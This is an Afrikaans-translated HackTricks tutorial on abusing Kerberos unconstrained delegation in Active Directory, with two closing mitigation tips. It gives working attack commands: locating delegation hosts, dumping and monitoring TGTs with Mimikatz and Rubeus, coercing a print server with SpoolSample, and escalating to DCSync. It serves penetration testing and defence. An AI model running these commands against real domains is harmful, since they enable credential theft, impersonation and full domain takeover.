Afrikaans - Ht
HackTricks Training Twitter Linkedin Sponsor

Unconstrained Delegation

Support HackTricks

Unconstrained delegation

Dit is 'n kenmerk wat 'n Domein Administrateur kan stel op enige Rekenaar binne die domein. Dan, wanneer 'n gebruiker aanmeld op die Rekenaar, sal 'n kopie van die TGT van daardie gebruiker binne die TGS wat deur die DC gestuur word en in geheue in LSASS gestoor word. So, as jy Administrateur regte op die masjien het, sal jy in staat wees om die kaartjies te dump en die gebruikers te verpersoonlik op enige masjien.

So as 'n domein admin aanmeld op 'n Rekenaar met die "Unconstrained Delegation" kenmerk geaktiveer, en jy het plaaslike admin regte op daardie masjien, sal jy in staat wees om die kaartjie te dump en die Domein Admin enige plek te verpersoonlik (domein privesc).

Jy kan Rekenaar objek met hierdie attribuut vind deur te kyk of die userAccountControl attribuut ADS_UF_TRUSTED_FOR_DELEGATION bevat. Jy kan dit doen met 'n LDAP filter van ‘(userAccountControl:1.2.840.113556.1.4.803:=524288)’, wat is wat powerview doen:

# List unconstrained computers
## Powerview
Get-NetComputer -Unconstrained #DCs always appear but aren't useful for privesc
## ADSearch
ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem
# Export tickets with Mimikatz
privilege::debug
sekurlsa::tickets /export #Recommended way
kerberos::list /export #Another way

# Monitor logins and export new tickets
.\Rubeus.exe monitor /targetuser:<username> /interval:10 #Check every 10s for new TGTs

Laai die kaartjie van die Administrateur (of slagoffer gebruiker) in geheue met Mimikatz of Rubeus vir 'n Pass the Ticket. Meer inligting: https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/ Meer inligting oor Unconstrained delegation in ired.team.

Force Authentication

As 'n aanvaller in staat is om 'n rekenaar wat toegelaat word vir "Unconstrained Delegation" te kompromitteer, kan hy 'n Druk bediener mislei om outomaties aan te meld teen dit en 'n TGT in die geheue van die bediener te stoor. Dan kan die aanvaller 'n Pass the Ticket aanval uitvoer om die gebruiker se Druk bediener rekenaarrekening te verpersoonlik.

Om 'n druk bediener teen enige masjien aan te meld, kan jy SpoolSample gebruik:

.\SpoolSample.exe <printmachine> <unconstrinedmachine>

If the TGT if from a domain controller, you could perform a DCSync attack and obtain all the hashes from the DC. More info about this attack in ired.team.

Hier is ander maniere om te probeer om 'n outentisering te dwing:

Force NTLM Privileged Authentication

Mitigering

  • Beperk DA/Admin aanmeldings tot spesifieke dienste

  • Stel "Rekening is sensitief en kan nie gedelegeer word nie" vir bevoorregte rekeninge.

Support HackTricks
PreviousSkeleton KeyNextWindows Security Controls

Last updated